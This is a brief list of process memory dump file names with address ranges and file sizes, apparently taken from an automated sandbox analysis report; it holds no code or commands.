                                                                        • memory/2856-37-0x0000000004670000-0x0000000004C98000-memory.dmp

                                                                          Filesize

                                                                          6.2MB

                                                                        • memory/2856-36-0x0000000004000000-0x0000000004036000-memory.dmp

                                                                          Filesize

                                                                          216KB

                                                                        • memory/2856-40-0x0000000004FB0000-0x0000000005016000-memory.dmp

                                                                          Filesize

                                                                          408KB

                                                                        • memory/2856-51-0x00000000055B0000-0x00000000055CE000-memory.dmp

                                                                          Filesize

                                                                          120KB

                                                                        • memory/2856-52-0x00000000055D0000-0x000000000561C000-memory.dmp

                                                                          Filesize

                                                                          304KB

                                                                        • memory/3152-482-0x00000000014D0000-0x00000000024D0000-memory.dmp

                                                                          Filesize

                                                                          16.0MB